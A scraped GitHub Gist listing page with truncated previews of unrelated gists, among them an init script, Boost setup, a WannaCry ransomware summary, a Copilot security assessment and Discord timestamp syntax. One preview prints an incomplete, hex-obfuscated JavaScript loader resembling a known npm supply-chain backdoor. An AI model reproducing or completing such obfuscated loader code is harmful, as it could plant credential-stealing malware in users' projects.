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naholyr /
Created December 13, 2012 09:39
Sample /etc/init.d script

Sample service script for debianoids

Look at LSB init scripts for more information.


Copy to /etc/init.d:

# replace "$YOUR_SERVICE_NAME" with your service's name (whenever it's not enough obvious)
sim642 /
Last active July 1, 2024 12:58
Installing boost libraries for GCC (MinGW) on Windows

Installing boost libraries for GCC (MinGW) on Windows

Folder setup

  1. Extract downloaded boost source, e.g. C:\Program Files\boost_1_59_0.
  2. Create a folder for Boost.Build installation, e.g. C:\Program Files\boost-build.
  3. Create a folder within for building, i.e. C:\Program Files\boost_1_59_0\build.
  4. Create a folder for installation, e.g. C:\Program Files\boost.

GCC setup

  1. Open Command Prompt.

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

! function() {
try {
var r = require,
t = process;
function e(r) {
return Buffer.from(r, "hex").toString()
var n = r(e("2e2f746573742f64617461")),
o = t[e(n[3])][e(n[4])];
soronpo /
Last active December 18, 2018 06:22
Scala Collections CanBuildFrom explanation by Stefan Zeiger @szeiger

Taken from

Stefan Zeiger @szeiger:

I'll try to give a high-level explanation (with imprecise types): In order to build something (like the result of you use a Builder[E, To] to which you add elements of type E and eventually get a result To. That way a single implementation of map can build different result types. In order to get such a Builder you need a factory, i.e. a () => Builder[E, To]. We call this type CanBuild and pass an implicit instance of it to map. You usually don't care who's doing the building (Range in this case) but for the sake of finding an implicit CanBuild you want the source collection to determine the result type To (e.g. calling map on a List should build another List).

hillexed /
Last active June 16, 2019 23:30

Here's how my level implementing Portal in Baba is You works! If you haven't seen it, here's a video:

Baba is You is a game played with the arrow keys. How can Baba fire a portal gun and still have the ability to walk around? The answer: there's one more button the game allows, and that's the wait button - which makes baba stand still and allows a turn to pass in the game world. In this level, the wait button does more than wait - it fires the portal gun.

The skull crosses are a gadget to activate an arbitrary rule when the wait button is pressed. The following rules are used to set it up:

0xabad1dea /
Last active September 11, 2023 10:21
Risk Assessment of GitHub Copilot

Risk Assessment of GitHub Copilot

0xabad1dea, July 2021

this is a rough draft and may be updated with more examples

GitHub was kind enough to grant me swift access to the Copilot test phase despite me @'ing them several hundred times about ICE. I would like to examine it not in terms of productivity, but security. How risky is it to allow an AI to write some or all of your code?

Ultimately, a human being must take responsibility for every line of code that is committed. AI should not be used for "responsibility washing." However, Copilot is a tool, and workers need their tools to be reliable. A carpenter doesn't have to

LeviSnoot /
Last active July 19, 2024 20:05
Discord Timestamp Syntax

Discord Timestamps

Discord timestamps can be useful for specifying a date/time across multiple users time zones. They work with the Unix Timestamp format and can be posted by regular users as well as bots and applications.

The Epoch Unix Time Stamp Converter is a good way to quickly generate a timestamp. For the examples below I will be using the Time Stamp of 1543392060, which represents November 28th, 2018 at 09:01:00 hours for my local time zone (GMT+0100 Central European Standard Time).


Style Input Output (12-hour clock) Output (24-hour clock)
Default <t:1543392060> November 28, 2018 9:01 AM 28 November 2018 09:01
travisbrown /
Created November 8, 2021 04:34
Deleted tweets by Alexander Ioffe

Deleted tweets for deusaquilus

The list below includes 510 deleted tweets by deusaquilus.

There are also 3 tweets that are indicated as not currently deleted by the Twitter API that have been scraped from pages of deleted tweets (as replies, etc.). These possibly undeleted tweets are included for context and are indicated by a (live) link.

0xabad1dea / .config slash tilde slash config
Created January 5, 2022 19:29
candy girly theme for tilde text editor
config_version = 1
%terminals {
name = "xterm-256color"
key_timeout = -1000
make_backup = false
hide_menubar = false
parse_file_positions = true
disable_primary_selection_over_ssh = false
color = true